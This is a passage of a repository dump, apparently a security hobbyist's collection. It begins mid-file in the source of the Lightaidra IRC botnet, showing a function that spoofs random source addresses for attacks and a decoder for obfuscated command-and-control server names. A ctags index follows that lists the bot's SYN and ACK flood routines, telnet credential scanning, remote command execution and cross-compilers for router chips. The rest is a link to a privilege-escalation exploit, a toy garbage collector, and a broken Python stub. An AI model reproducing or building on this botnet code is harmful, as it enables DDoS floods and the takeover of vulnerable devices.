return; 282 | } 283 | 284 | /* get_spoofed_addr() */ 285 | /* return a spoofed address for attacks. */ 286 | unsigned int get_spoofed() { 287 | char spa[21]; 288 | int a, b, c, d; 289 | 290 | srand(time(0)); 291 | 292 | random_ct = rand(); 293 | random_num = ((random_ct % 254) + 1); 294 | a = random_num; 295 | 296 | random_ct = rand(); 297 | random_num = ((random_ct % 254) + 1); 298 | b = random_num; 299 | 300 | random_ct = rand(); 301 | random_num = ((random_ct % 254) + 1); 302 | c = random_num; 303 | 304 | random_ct = rand(); 305 | random_num = ((random_ct % 254) + 1); 306 | d = random_num; 307 | 308 | snprintf(spa, sizeof(spa), "%d.%d.%d.%d", a, b, c, d); 309 | 310 | return ((unsigned int)host2ip(spa)); 311 | } 312 | 313 | /* pidprocess() */ 314 | /* check for clones */ 315 | void pidprocess() { 316 | FILE *pidfd; 317 | unsigned int pidc; 318 | 319 | if (!access(pidfile, F_OK) && !access(pidfile, R_OK)) { 320 | if ((pidfd = fopen(pidfile, "r+")) != NULL) { 321 | fscanf(pidfd, "%d", &pidc); 322 | fclose(pidfd); 323 | kill(pidc, SIGKILL); 324 | remove(pidfile); 325 | } 326 | } 327 | 328 | if ((pidfd = fopen(pidfile, "a+")) != NULL) { 329 | fprintf(pidfd, "%d", getpid()); 330 | fclose(pidfd); 331 | } 332 | 333 | return; 334 | } 335 | 336 | /* decode() */ 337 | /* a function to decode irc servers */ 338 | /* encoded by ircencode.c tool */ 339 | void decode(char *str, int dtype) { 340 | char decoded[512]; 341 | int x = 0, i = 0, c; 342 | 343 | char encodes[] = { 344 | '<', '>', '@', '_', ';', ':', ',', '.', '-', '+', '*', '^', '?', '=', ')', '(', 345 | '|', 'A', 'B', '&', '%', '$', 'D', '"', '!', 'w', 'k', 'y', 'x', 'z', 'v', 'u', 346 | 't', 's', 'r', 'q', 'p', 'o', 'n', 'm', 'l', 'i', 'h', 'g', 'f', 'e', 'd', 'c', 347 | 'b', 'a', '~', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'F', 'U', 'C', 'K' 348 | }; 349 | 350 | char decodes[] = { 351 | '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 352 | 'g', 'h', 'i', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'z', 'y', 353 | 'w', 'k', 'x', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'L', 'M', 'N', 'O', 354 | 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'Z', 'Y', 'W', 'K', 'X', '|', ':', '.', '*' 355 | }; 356 | 357 | memset(decoded, 0, sizeof(decoded)); 358 | 359 | while (x < strlen(str)) { 360 | for (c = 0; c <= sizeof(encodes); c++) { 361 | if (str[x] == encodes[c]) { 362 | if (!dtype) decodedsrv[i] = decodes[c]; 363 | else decodedpsw[i] = decodes[c]; 364 | 365 | i++; 366 | } 367 | } 368 | 369 | x++; 370 | } 371 | 372 | return; 373 | } 374 | -------------------------------------------------------------------------------- /lightaidra/tags: -------------------------------------------------------------------------------- 1 | !_TAG_FILE_FORMAT 2 /extended format; --format=1 will not append ;" to lines/ 2 | !_TAG_FILE_SORTED 1 /0=unsorted, 1=sorted, 2=foldcase/ 3 | !_TAG_PROGRAM_AUTHOR Darren Hiebert /dhiebert@users.sourceforge.net/ 4 | !_TAG_PROGRAM_NAME Exuberant Ctags // 5 | !_TAG_PROGRAM_URL http://ctags.sourceforge.net /official site/ 6 | !_TAG_PROGRAM_VERSION 5.9~svn20110310 // 7 | CFLAGS Makefile /^CFLAGS=-lpthread -pthread$/;" m 8 | EXIT_FAILURE include/headers.h 31;" d 9 | EXIT_FAILURE include/headers.h 32;" d 10 | IPREQUEST include/utils.h 4;" d 11 | __ATTACKS_H_ include/attacks.h 2;" d 12 | __CONFIG_H_ include/config.h 2;" d 13 | __HEADERS_H_ include/headers.h 2;" d 14 | __IRC_H_ include/irc.h 2;" d 15 | __MAIN_H_ include/main.h 2;" d 16 | __REQUESTS_H_ include/requests.h 2;" d 17 | __SCAN_H include/scan.h 2;" d 18 | __UTILS_H_ include/utils.h 2;" d 19 | __alarm source/scan.c /^void __alarm() {$/;" f 20 | __netbuf include/scan.h /^char __netbuf[sizebuf];$/;" v 21 | ackflood source/attacks.c /^void ackflood(sock_t * sp, unsigned int dest_addr, unsigned short dest_port, int ntime) {$/;" f 22 | all_messages include/config.h 24;" d 23 | arm_bin Makefile /^arm_bin=bin\/arm$/;" m 24 | arm_cc Makefile /^arm_cc=.\/bin\/cross-compiler-armv5l\/bin\/armv5l-gcc$/;" m 25 | background_mode include/config.h 5;" d 26 | buf include/attacks.h /^ char buf[20];$/;" m struct:pseudo_header 27 | buf include/attacks.h /^ char buf[20];$/;" m struct:send_tcp 28 | channel include/irc.h /^char *data_ptr, channel[32];$/;" v 29 | cmd_advscan source/requests.c /^int cmd_advscan(sock_t *sp, requests_t *req) {$/;" f 30 | cmd_advscan_control source/scan.c /^int cmd_advscan_control(char *addr, sock_t *sp, requests_t *req, unsigned short type) {$/;" f 31 | cmd_advscan_getpass source/scan.c /^int cmd_advscan_getpass(sock_t *scan_sp) {$/;" f 32 | cmd_advscan_join source/scan.c /^int cmd_advscan_join(char *addr, sock_t *sp, requests_t *req, unsigned short type) {$/;" f 33 | cmd_advscan_random source/requests.c /^int cmd_advscan_random(sock_t *sp, requests_t *req, int t) {$/;" f 34 | cmd_advscan_recursive source/requests.c /^int cmd_advscan_recursive(sock_t *sp, requests_t *req) {$/;" f 35 | cmd_exec source/requests.c /^void cmd_exec(sock_t *sp, requests_t *req, char *token) {$/;" f 36 | cmd_help source/requests.c /^void cmd_help(sock_t *sp) {$/;" f 37 | cmd_init source/requests.c /^int cmd_init(sock_t *sp) {$/;" f 38 | cmd_join source/requests.c /^void cmd_join(sock_t *sp, requests_t *req) {$/;" f 39 | cmd_login source/requests.c /^void cmd_login(sock_t *sp, requests_t * req) {$/;" f 40 | cmd_logout source/requests.c /^void cmd_logout(sock_t *sp, requests_t *req) {$/;" f 41 | cmd_packeting source/requests.c /^int cmd_packeting(sock_t *sp, requests_t *req) {$/;" f 42 | cmd_part source/requests.c /^void cmd_part(sock_t *sp, requests_t *req) {$/;" f 43 | cmd_ping source/requests.c /^int cmd_ping(sock_t *sp) {$/;" f 44 | cmd_quit source/requests.c /^void cmd_quit(sock_t *sp, requests_t *req) {$/;" f 45 | cmd_scan_central source/scan.c /^void cmd_scan_central(sock_t *sp, requests_t *req, unsigned short type) {$/;" f 46 | cmd_setchan source/requests.c /^void cmd_setchan(sock_t *sp, requests_t *req) {$/;" f 47 | cmd_spoof source/requests.c /^void cmd_spoof(sock_t *sp, requests_t *req) {$/;" f 48 | cmd_status source/requests.c /^void cmd_status(sock_t *sp) {$/;" f 49 | cmd_stop source/requests.c /^void cmd_stop(sock_t *sp) {$/;" f 50 | cmd_version source/requests.c /^void cmd_version(sock_t *sp) {$/;" f 51 | connect_to_irc source/irc.c /^int connect_to_irc(sock_t *sp) {$/;" f 52 | counter include/main.h /^unsigned short counter, total;$/;" v 53 | create_irc_servlist source/utils.c /^void create_irc_servlist() {$/;" f 54 | daemonize source/utils.c /^void daemonize() {$/;" f 55 | daemonize_pid include/utils.h /^pid_t daemonize_pid;$/;" v 56 | data_ptr include/irc.h /^char *data_ptr, channel[32];$/;" v 57 | decode source/hide.c /^void decode(char *str) {$/;" f 58 | decode source/utils.c /^void decode(char *str, int dtype) {$/;" f 59 | decoded source/hide.c /^char encoded[512], decoded[512];$/;" v 60 | decodedpsw include/utils.h /^char decodedsrv[512], decodedpsw[32];$/;" v 61 | decodedsrv include/utils.h /^char decodedsrv[512], decodedpsw[32];$/;" v 62 | decodes source/hide.c /^char decodes[] = { $/;" v 63 | dest_address include/attacks.h /^ unsigned int dest_address;$/;" m struct:pseudo_header 64 | dsthost include/attacks.h /^unsigned int dsthost;$/;" v 65 | enc_passwd include/config.h 18;" d 66 | enc_servers include/config.h 17;" d 67 | encirc include/config.h 16;" d 68 | encode source/hide.c /^void encode(char *str) {$/;" f 69 | encoded source/hide.c /^char encoded[512], decoded[512];$/;" v 70 | encodes source/hide.c /^char encodes[] = { $/;" v 71 | false include/main.h 5;" d 72 | founds include/scan.h /^unsigned short total, founds;$/;" v 73 | g_pid include/scan.h /^pid_t pid, g_pid;$/;" v 74 | get_spoofed source/utils.c /^unsigned int get_spoofed() {$/;" f 75 | getbinaries include/scan.h 27;" d 76 | getextip source/utils.c /^int getextip(sock_t *sp, requests_t *req) {$/;" f 77 | getrstr source/utils.c /^char *getrstr() {$/;" f 78 | hide_bin Makefile /^hide_bin=bin\/hide$/;" m 79 | host2ip source/utils.c /^unsigned int host2ip(char *hostname) {$/;" f 80 | hostname include/scan.h /^ char hostname[32];$/;" m struct:__anon3 81 | hosts include/scan.h /^char hosts[maxhosts][16];$/;" v 82 | http_port include/scan.h 5;" d 83 | in_cksum source/utils.c /^unsigned short in_cksum(unsigned short *ptr, int nbytes) {$/;" f 84 | ip include/attacks.h /^ struct iphdr ip;$/;" m struct:send_tcp typeref:struct:send_tcp::iphdr 85 | ipreq include/utils.h 11;" d 86 | ipreq include/utils.h 13;" d 87 | ipreq include/utils.h 15;" d 88 | ipreq include/utils.h 17;" d 89 | ipreq include/utils.h 7;" d 90 | ipreq include/utils.h 9;" d 91 | irc_chan include/config.h 21;" d 92 | irc_chankey include/config.h 26;" d 93 | irc_nick_prefix include/config.h 50;" d 94 | irc_nick_prefix include/config.h 54;" d 95 | irc_nick_prefix include/config.h 58;" d 96 | irc_nick_prefix include/config.h 62;" d 97 | irc_nick_prefix include/config.h 66;" d 98 | irc_nick_prefix include/config.h 70;" d 99 | irc_passwd include/config.h 13;" d 100 | irc_requests source/irc.c /^int irc_requests(sock_t *sp, requests_t *req) {$/;" f 101 | irc_servers include/config.h 11;" d 102 | isrv include/main.h /^char *isrv[10];$/;" v 103 | login source/utils.c /^int login(sock_t *sp, requests_t *req) {$/;" f 104 | login_control source/utils.c /^int login_control(requests_t *req) {$/;" f 105 | login_status include/requests.h /^int login_status, stop;$/;" v 106 | main source/hide.c /^int main(int argc, char *argv[]) {$/;" f 107 | main source/main.c /^int main(int argc, char **argv) {$/;" f 108 | master_host include/config.h 29;" d 109 | master_password include/config.h 31;" d 110 | max_pids include/irc.h /^int max_pids, pid_status;$/;" v 111 | maxhosts include/scan.h 7;" d 112 | maxthreads include/config.h 52;" d 113 | maxthreads include/config.h 56;" d 114 | maxthreads include/config.h 60;" d 115 | maxthreads include/config.h 64;" d 116 | maxthreads include/config.h 68;" d 117 | maxthreads include/config.h 72;" d 118 | mips_bin Makefile /^mips_bin=bin\/mips$/;" m 119 | mips_cc Makefile /^mips_cc=.\/bin\/cross-compiler-mips\/bin\/mips-gcc$/;" m 120 | mipsel_bin Makefile /^mipsel_bin=bin\/mipsel$/;" m 121 | mipsel_cc Makefile /^mipsel_cc=.\/bin\/cross-compiler-mipsel\/bin\/mipsel-gcc$/;" m 122 | nctype include/config.h 51;" d 123 | nctype include/config.h 55;" d 124 | nctype include/config.h 59;" d 125 | nctype include/config.h 63;" d 126 | nctype include/config.h 67;" d 127 | nctype include/config.h 71;" d 128 | netbuf include/irc.h /^char netbuf[sizebuf];$/;" v 129 | ngackflood source/attacks.c /^void ngackflood(sock_t * sp, unsigned int dest_addr, unsigned short dest_port, int ntime) {$/;" f 130 | ngsynflood source/attacks.c /^void ngsynflood(sock_t * sp, unsigned int dest_addr, unsigned short dest_port, int ntime) {$/;" f 131 | nt include/requests.h /^char *token, status_temp[128], nt[3];$/;" v 132 | parse_input_errors source/utils.c /^int parse_input_errors(sock_t *sp, requests_t *req, $/;" f 133 | passproto include/config.h 12;" d 134 | pid include/scan.h /^pid_t pid, g_pid;$/;" v 135 | pid_status include/irc.h /^int max_pids, pid_status;$/;" v 136 | pidfile include/main.h 8;" d 137 | pidprocess source/utils.c /^void pidprocess() {$/;" f 138 | placeholder include/attacks.h /^ unsigned char placeholder;$/;" m struct:pseudo_header 139 | post_request include/scan.h 30;" d 140 | ppc_bin Makefile /^ppc_bin=bin\/ppc$/;" m 141 | ppc_cc Makefile /^ppc_cc=.\/bin\/cross-compiler-powerpc\/bin\/powerpc-gcc$/;" m 142 | protocol include/attacks.h /^ unsigned char protocol;$/;" m struct:pseudo_header 143 | pseudo_header include/attacks.h /^struct pseudo_header {$/;" s 144 | psw_x include/scan.h /^char psw_x[32], psw_y[32];$/;" v 145 | psw_y include/scan.h /^char psw_x[32], psw_y[32];$/;" v 146 | pub_requests source/requests.c /^int pub_requests(sock_t *sp, requests_t *req) {$/;" f 147 | random_ct include/requests.h /^int random_ct, random_num;$/;" v 148 | random_num include/requests.h /^int random_ct, random_num;$/;" v 149 | rcv_a include/irc.h /^ char rcv_a[128];$/;" m struct:__anon2 150 | rcv_b include/irc.h /^ char rcv_b[static_rcv];$/;" m struct:__anon2 151 | rcv_c include/irc.h /^ char rcv_c[static_rcv];$/;" m struct:__anon2 152 | rcv_sa include/irc.h /^ char rcv_sa[static_rcv];$/;" m struct:__anon2 153 | rcv_sb include/irc.h /^ char rcv_sb[static_rcv];$/;" m struct:__anon2 154 | rcv_sc include/irc.h /^ char rcv_sc[static_rcv];$/;" m struct:__anon2 155 | rcv_sd include/irc.h /^ char rcv_sd[static_rcv];$/;" m struct:__anon2 156 | rcv_se include/irc.h /^ char rcv_se[static_rcv];$/;" m struct:__anon2 157 | recv_bytes include/irc.h /^unsigned int recv_bytes;$/;" v 158 | reference_arm include/config.h 41;" d 159 | reference_http include/config.h 34;" d 160 | reference_mips include/config.h 39;" d 161 | reference_mipsel include/config.h 38;" d 162 | reference_ppc include/config.h 42;" d 163 | reference_superh include/config.h 40;" d 164 | requests_t include/irc.h /^} requests_t;$/;" t typeref:struct:__anon2 165 | resbuf include/scan.h /^char resbuf[21], restag[21];$/;" v 166 | resfd include/scan.h /^FILE *resfd, *statfd;$/;" v 167 | restag include/scan.h /^char resbuf[21], restag[21];$/;" v 168 | result_file include/main.h 7;" d 169 | scan_address source/scan.c /^void *scan_address(scan_data_t *scan_data) {$/;" f 170 | scan_data_t include/scan.h /^} scan_data_t;$/;" t typeref:struct:__anon3 171 | scan_sp include/scan.h /^sock_t *scan_sp;$/;" v 172 | send_tcp include/attacks.h /^struct send_tcp {$/;" s 173 | sigkill source/requests.c /^void sigkill() {$/;" f 174 | sizebuf include/main.h 10;" d 175 | sock_t include/irc.h /^} sock_t;$/;" t typeref:struct:__anon1 176 | sockadr include/irc.h /^ struct sockaddr_in sockadr;$/;" m struct:__anon1 typeref:struct:__anon1::sockaddr_in 177 | sockfd include/irc.h /^ int sockfd;$/;" m struct:__anon1 178 | sockhs include/irc.h /^ struct hostent *sockhs;$/;" m struct:__anon1 typeref:struct:__anon1::hostent 179 | sockwrite source/utils.c /^int sockwrite(int sd, const char *fmt, ...) {$/;" f 180 | source_address include/attacks.h /^ unsigned int source_address;$/;" m struct:pseudo_header 181 | srchost include/attacks.h /^unsigned long srchost;$/;" v 182 | statfd include/scan.h /^FILE *resfd, *statfd;$/;" v 183 | static_rcv include/irc.h 4;" d 184 | status_temp include/requests.h /^char *token, status_temp[128], nt[3];$/;" v 185 | stop include/requests.h /^int login_status, stop;$/;" v 186 | superh_bin Makefile /^superh_bin=bin\/sh$/;" m 187 | superh_cc Makefile /^superh_cc=.\/bin\/cross-compiler-sh4\/bin\/sh4-gcc$/;" m 188 | synflood source/attacks.c /^void synflood(sock_t * sp, unsigned int dest_addr, unsigned short dest_port, int ntime) {$/;" f 189 | tcp include/attacks.h /^ struct tcphdr tcp;$/;" m struct:pseudo_header typeref:struct:pseudo_header::tcphdr 190 | tcp include/attacks.h /^ struct tcphdr tcp;$/;" m struct:send_tcp typeref:struct:send_tcp::tcphdr 191 | tcp_length include/attacks.h /^ unsigned short tcp_length;$/;" m struct:pseudo_header 192 | telnet_port include/scan.h 4;" d 193 | timeout_value include/scan.h /^int timeout_value;$/;" v 194 | tm include/scan.h /^struct timeval tm;$/;" v typeref:struct:timeval 195 | token include/requests.h /^char *token, status_temp[128], nt[3];$/;" v 196 | total include/main.h /^unsigned short counter, total;$/;" v 197 | total include/scan.h /^unsigned short total, founds;$/;" v 198 | true include/main.h 4;" d 199 | twordcmp source/utils.c /^int twordcmp(const char *s, requests_t *req) {$/;" f 200 | uport include/attacks.h /^unsigned short uport;$/;" v 201 | useconds include/attacks.h /^unsigned int useconds;$/;" v 202 | wordcmp source/utils.c /^int wordcmp(const char *s, requests_t *req) {$/;" f 203 | wordcmpp source/utils.c /^int wordcmpp(const char *s, requests_t *req) {$/;" f 204 | x86_32bin Makefile /^x86_32bin=bin\/x86_32$/;" m 205 | x86_32cc Makefile /^x86_32cc=\/usr\/bin\/gcc -m32$/;" m 206 | x86_64bin Makefile /^x86_64bin=bin\/x86_64$/;" m 207 | x86_64cc Makefile /^x86_64cc=\/usr\/bin\/gcc -m64 -O2$/;" m 208 | -------------------------------------------------------------------------------- /lpe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/lpe -------------------------------------------------------------------------------- /mark_and_sweep.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #define ASSERT(cond, msg, ...) ((cond) ? (int)0x1337 : (printf("\033[1;31m[ASSERT]\033[0m " msg "\n", __VA_ARGS__))) 6 | #define LOG(type, msg, ...) (printf("\033[1;32m[" type " LOG]\033[0m " msg "\n", __VA_ARGS__)) 7 | 8 | typedef enum { 9 | INT_TYPE, 10 | STRING_TYPE, 11 | OBJ_TYPE 12 | } TYPE; 13 | 14 | typedef struct mObject { 15 | TYPE type; 16 | unsigned char is_marked; 17 | struct mObject *next; 18 | union { 19 | // primitive type for INT_TYPE 20 | int primitive_value; 21 | 22 | // primitive type for STRING_TYPE 23 | char *string; 24 | 25 | // linked list for OBJ_TYPE 26 | struct { 27 | struct mObject *head; 28 | struct mObject *tail; 29 | }; 30 | }; 31 | } Object; 32 | 33 | struct file_operations; 34 | 35 | #define MAX 0x100 36 | // This vm is stack based machine 37 | typedef struct { 38 | Object *stack[MAX]; 39 | Object *root; 40 | unsigned int size; 41 | unsigned int numObjs; 42 | unsigned int maxObjs; 43 | 44 | // file operations 45 | // Need to be implemented in OOP Model... 46 | struct file_operations *fops; 47 | } simpleVM; 48 | 49 | // push 50 | void push(simpleVM *vm, Object *value) { 51 | if (ASSERT(vm->size < MAX, "Stack size is overflowed, [current : %d]", vm->size) != 0x1337) { 52 | exit(-1); 53 | } 54 | vm->stack[vm->size++] = value; 55 | } 56 | 57 | // pop 58 | Object *pop(simpleVM *vm) { 59 | if (ASSERT(vm->size > 0, "%s", "Stack size is underflowed") != 0x1337) { 60 | exit(-1); 61 | } 62 | return vm->stack[--vm->size]; 63 | } 64 | 65 | // Forward declare 66 | void gc(simpleVM *vm); 67 | Object *createObject(simpleVM *vm, TYPE type) { 68 | // Need to collect garbage 69 | if (vm->numObjs == vm->maxObjs) { 70 | gc(vm); 71 | } 72 | 73 | Object *object = (Object *)malloc(sizeof(Object)); 74 | object->type = type; 75 | 76 | // set linked list 77 | object->next = vm->root; 78 | vm->root = object; 79 | 80 | object->is_marked = 0; 81 | vm->numObjs++; 82 | return object; 83 | } 84 | 85 | void pushInt(simpleVM *vm, int value) { 86 | Object *object = createObject(vm, INT_TYPE); 87 | object->primitive_value = value; 88 | push(vm, object); 89 | LOG("pushInt", "push Int : %d", value); 90 | } 91 | 92 | void pushString(simpleVM *vm, char *string) { 93 | Object *object = createObject(vm, STRING_TYPE); 94 | object->string = string; 95 | push(vm, object); 96 | LOG("pushString", "push String : %s", string); 97 | } 98 | 99 | // Pair Object :) 100 | Object *pushObject(simpleVM *vm) { 101 | Object *object = createObject(vm, OBJ_TYPE); 102 | object->tail = pop(vm); 103 | object->head = pop(vm); 104 | 105 | push(vm, object); 106 | LOG("pushObject", "push Object pair : %p", object); 107 | return object; 108 | } 109 | 110 | void dump(Object *object) { 111 | switch (object->type) { 112 | case INT_TYPE: 113 | LOG("DUMP", "INT_TYPE : %d", object->primitive_value); 114 | break; 115 | 116 | case STRING_TYPE: 117 | LOG("DUMP", "STRING_TYPE : %s", object->string); 118 | break; 119 | 120 | case OBJ_TYPE: 121 | LOG("DUMP", "%s", "Will be implemented"); 122 | break; 123 | 124 | default: 125 | LOG("DUMP", "%s", "UNKNOWN"); 126 | break; 127 | } 128 | } 129 | 130 | struct file_operations { 131 | void (*pushInt)(simpleVM *, int); 132 | void (*pushString)(simpleVM *, char *); 133 | Object *(*pushObject)(simpleVM *); 134 | Object *(*pop)(simpleVM *); 135 | }; 136 | 137 | simpleVM *createVM() { 138 | simpleVM *vm = (simpleVM *)malloc(sizeof(simpleVM)); 139 | vm->size = 0; 140 | vm->numObjs = 0; 141 | vm->maxObjs = 0; 142 | vm->root = NULL; 143 | 144 | vm->fops = (struct file_operations *)malloc(sizeof(struct file_operations)); 145 | vm->fops->pushInt = pushInt; 146 | vm->fops->pushString = pushString; 147 | vm->fops->pushObject = pushObject; 148 | vm->fops->pop = pop; 149 | 150 | LOG("createVM", "VM is created : %p", vm); 151 | return vm; 152 | } 153 | 154 | void mark(Object *object) { 155 | if (object->is_marked) { 156 | return; 157 | } 158 | 159 | object->is_marked = 1; 160 | if (object->type == OBJ_TYPE) { 161 | mark(object->head); 162 | mark(object->tail); 163 | } 164 | } 165 | 166 | void mark_phase(simpleVM *vm) { 167 | for (int i = 0; i < vm->size; i++) { 168 | mark(vm->stack[i]); 169 | } 170 | } 171 | 172 | void sweep(simpleVM *vm) { 173 | Object *object = vm->root; 174 | while (object) { 175 | // reached -> doesn't need to GC 176 | if (object->is_marked) { 177 | // For next GC 178 | object->is_marked = 0; 179 | object = object->next; 180 | } 181 | // unreached 182 | else { 183 | Object *unreached = object; 184 | object = unreached->next; 185 | free(unreached); 186 | vm->numObjs--; 187 | } 188 | } 189 | } 190 | 191 | void gc(simpleVM *vm) { 192 | unsigned int numObjs = vm->numObjs; 193 | 194 | mark_phase(vm); 195 | sweep(vm); 196 | 197 | // Expand storage 198 | vm->maxObjs = vm->numObjs * 2; 199 | LOG("GC", "Collected %d objects, %d remaining.", numObjs - vm->numObjs, vm->numObjs); 200 | } 201 | 202 | int main(int argc, char *argv[]) { 203 | LOG("MAIN", "%s", "Garbage Collector (Mark and Sweep Algorithm Test"); 204 | simpleVM *vm = createVM(); 205 | for (int i = 0; i < 0x10; i++) { 206 | vm->fops->pushInt(vm, 0x41 + i); 207 | } 208 | 209 | vm->fops->pushString(vm, "asiagaming"); 210 | 211 | Object *object = vm->root; 212 | while (object) { 213 | dump(object); 214 | object = object->next; 215 | } 216 | 217 | // Primitive value isn't needed to be GC 218 | Object *t1 = vm->fops->pushObject(vm); 219 | Object *t2 = vm->fops->pushObject(vm); 220 | t1->tail = t2; 221 | t2->tail = t1; 222 | 223 | // Collect 1 224 | gc(vm); 225 | return 0; 226 | } 227 | -------------------------------------------------------------------------------- /synthesis/README.md: -------------------------------------------------------------------------------- 1 | # Semantic Diff Tester 2 | 3 | - Z3 Theorem Prover 4 | - Capstone Disassemble Engine 5 | - Make Default SSA Form 6 | - Generate SMT Formula 7 | 8 | -------------------------------------------------------------------------------- /synthesis/synthesis.py: -------------------------------------------------------------------------------- 1 | import z3 2 | import sys, time 3 | import ctypes 4 | import capstone 5 | 6 | # For Binary Disassemble 7 | # Generate x86 code 8 | # Instruction Parsing? 9 | class Opcode(object): 10 | def __init__(self): 11 | self.prefix = None 12 | self.mnem = None 13 | self.operand1 = None 14 | self.operand2 = None 15 | self.operand3 = None 16 | 17 | 18 | class BinAnalyzer(object): 19 | def __init__(self): 20 | pass 21 | 22 | 23 | 24 | # Generate BasicBlocks and make CFG 25 | class Differ(object): 26 | def __init__(self): 27 | pass 28 | 29 | def CodeGen(self): 30 | pass 31 | 32 | def Analyze(self): 33 | pass 34 | 35 | 36 | # Do we really need IR Synthesize? 37 | # Do we really need Hypotheses? 38 | class IntermediateRepresentation(object): 39 | def __init__(self): 40 | pass 41 | 42 | def x86_to_IR(self): 43 | pass 44 | 45 | def SSAGen(self): 46 | pass 47 | 48 | 49 | # For Verification Purpose 50 | # For Emulation? 51 | class VM(object): 52 | def __init__(self): 53 | self.context_before = {} 54 | self.context_after = {} 55 | self.page = None 56 | self.greg = [] 57 | self.sreg = [] 58 | self.freg = [] 59 | self.memory = None 60 | 61 | def SetRWX(self, size) 62 | ptr = ctypes.pythonapi.valloc(size) 63 | ctypes.pythonapi.mprotect(ptr, size, 1|2|4) # 1|2|4 is read|write|execute 64 | self.page = ptr 65 | 66 | # For IR Semantic Verification 67 | # Can we set Signal Handler for this? 68 | # IDEA -> Do Fuzz in here, and get Result from VM 69 | def JIT(self): 70 | pass 71 | 72 | 73 | def main(): 74 | print("[-] Hello :)") 75 | 76 | if __name__ == "__main__": 77 | main() 78 | 79 | --------------------------------------------------------------------------------